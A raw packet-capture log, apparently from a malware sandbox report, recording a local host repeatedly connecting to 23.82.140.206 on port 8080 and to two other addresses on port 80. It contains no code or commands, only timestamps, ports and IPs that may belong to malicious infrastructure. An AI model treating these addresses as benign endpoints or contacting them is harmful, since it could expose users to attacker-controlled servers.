                                          Sep 27, 2021 20:26:23.062376976 CEST4983780192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:23.066384077 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.165256977 CEST8049837107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:23.192723036 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.192820072 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.193414927 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.205740929 CEST8049837107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:23.319097996 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.323359013 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.323436975 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.451092958 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.451212883 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.451514959 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.453447104 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.500766039 CEST8049837107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:23.500791073 CEST8049837107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:23.500870943 CEST4983780192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:23.582321882 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.584894896 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.584904909 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.584908009 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.584909916 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.584912062 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.584913969 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.585020065 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.585617065 CEST498388080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.640311003 CEST4983980192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:23.712225914 CEST80804983823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.743791103 CEST8049839107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:23.743932962 CEST4983980192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:23.744116068 CEST4983980192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:23.744133949 CEST4983980192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:23.832142115 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.847362995 CEST8049839107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:23.887810946 CEST8049839107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:23.963562012 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:23.963860989 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:23.964410067 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.095736027 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.097739935 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.098602057 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.136245012 CEST8049839107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:24.136291981 CEST8049839107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:26:24.136450052 CEST4983980192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:26:24.229540110 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.229790926 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.230218887 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.232857943 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.360884905 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.364418030 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.364779949 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.365000963 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.365060091 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.365088940 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.365118027 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.365164042 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.365165949 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.365180016 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.365324974 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.365952015 CEST498408080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.497443914 CEST80804984023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.703588009 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.707851887 CEST4984280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:24.833848000 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.833993912 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.834685087 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.966300964 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.966320992 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:24.967415094 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:24.987204075 CEST8049842103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:24.987370014 CEST4984280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:24.987550020 CEST4984280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:24.987651110 CEST4984280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:25.093396902 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.094927073 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.094959974 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.100533009 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.228799105 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.228822947 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.229233027 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.229320049 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.230417013 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.230452061 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.230475903 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.230504036 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.230515003 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.230524063 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.230545044 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.230595112 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.231198072 CEST498418080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.259238958 CEST8049842103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:25.298490047 CEST8049842103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:25.358689070 CEST80804984123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.489613056 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.623559952 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.623775959 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.624507904 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.760308027 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.760680914 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.760785103 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.857264042 CEST8049842103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:25.857292891 CEST8049842103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:25.857489109 CEST4984280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:25.893022060 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:25.893147945 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.893518925 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:25.895643950 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.004420996 CEST4984480192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:26.025701046 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.027729034 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.028491974 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.028557062 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.028582096 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.028593063 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.028613091 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.028634071 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.028652906 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.028667927 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.028683901 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.028697968 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.028702021 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.028762102 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.029320002 CEST498438080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.160676003 CEST80804984323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.281879902 CEST8049844103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:26.282026052 CEST4984480192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:26.282356024 CEST4984480192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:26.282470942 CEST4984480192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:26.296916008 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.429265022 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.429408073 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.430170059 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.553941965 CEST8049844103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:26.556104898 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.557998896 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.558100939 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.593651056 CEST8049844103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:26.683248997 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.683311939 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.683707952 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.685827017 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.808959961 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.811443090 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.812500000 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.812527895 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.812553883 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.812577009 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.812597990 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.812602043 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.812623978 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:26.812670946 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.812685966 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.813427925 CEST498458080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:26.938997030 CEST80804984523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.071234941 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.115350962 CEST8049844103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:27.115395069 CEST8049844103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:27.115525007 CEST4984480192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:27.203525066 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.203639984 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.204159021 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.329946995 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.331738949 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.332667112 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.458909035 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.459022999 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.459538937 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.461878061 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.566180944 CEST4984780192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:27.586673021 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.588740110 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.589555979 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.589585066 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.589603901 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.589626074 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.589658976 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.589669943 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.589689970 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.589694023 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.589725971 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.589754105 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.590513945 CEST498468080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.718233109 CEST80804984623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.836854935 CEST8049847103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:27.839157104 CEST4984780192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:27.839397907 CEST4984780192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:27.839524984 CEST4984780192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:27.849325895 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.975507021 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:27.975939989 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:27.976650953 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.103513956 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.104235888 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.106555939 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.109775066 CEST8049847103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:28.149837017 CEST8049847103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:28.235210896 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.235326052 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.235629082 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.238943100 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.361603975 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.368685007 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.369005919 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.369039059 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.369066954 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.369100094 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.369116068 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.369126081 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.369148016 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.369174957 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.369209051 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.369649887 CEST498488080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.498672009 CEST80804984823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.614363909 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.680540085 CEST8049847103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:28.680567980 CEST8049847103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:28.680685043 CEST4984780192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:28.755126953 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.756727934 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.756769896 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:28.819632053 CEST4985080192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:28.888938904 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.890815973 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:28.890914917 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.021629095 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.021719933 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.022162914 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.024971008 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.088557959 CEST8049850103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:29.088716984 CEST4985080192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:29.088943005 CEST4985080192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:29.089082956 CEST4985080192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:29.155560017 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.156035900 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.156928062 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.157054901 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.157118082 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.157188892 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.158755064 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.158782959 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.158802032 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.158826113 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.158848047 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.158914089 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.160656929 CEST498498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.292251110 CEST80804984923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.358644009 CEST8049850103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:29.398014069 CEST8049850103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:29.458679914 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.583641052 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.583781958 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.584877014 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.712647915 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.712760925 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.712857962 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.839191914 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.839510918 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.839936018 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.842807055 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.898808002 CEST8049850103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:29.898915052 CEST8049850103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:29.899041891 CEST4985080192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:29.964298010 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.967431068 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.968489885 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.968673944 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.968739033 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.968763113 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.968821049 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.968841076 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:29.972867012 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.972901106 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.972906113 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.972908974 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.972912073 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.972914934 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:29.972918034 CEST498518080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.040257931 CEST4985280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:30.097976923 CEST80804985123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.240653992 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.310919046 CEST8049852103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:30.311079979 CEST4985280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:30.311337948 CEST4985280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:30.311438084 CEST4985280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:30.374437094 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.374722004 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.375513077 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.507261992 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.509892941 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.510118961 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.582585096 CEST8049852103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:30.624686003 CEST8049852103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:30.642232895 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.642888069 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.643644094 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.646950960 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.775458097 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.779005051 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.779901028 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.780132055 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.780186892 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.780215979 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.780235052 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.780255079 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.780303955 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.780307055 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.780318975 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:30.780348063 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.780390024 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.781392097 CEST498538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:30.913116932 CEST80804985323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.036431074 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.158032894 CEST8049852103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:31.158061981 CEST8049852103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:31.158184052 CEST4985280192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:31.167903900 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.168051958 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.168859959 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.300915956 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.302341938 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.302546024 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.339356899 CEST4985580192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:31.433505058 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.433620930 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.434336901 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.437454939 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.565423012 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.568511963 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.569437981 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.569464922 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.569488049 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.569509029 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.569562912 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.569598913 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.569601059 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.569631100 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.569634914 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.569688082 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.570992947 CEST498548080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.702920914 CEST80804985423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.818556070 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:31.946765900 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:31.947026968 CEST498568080192.168.2.723.82.140.206
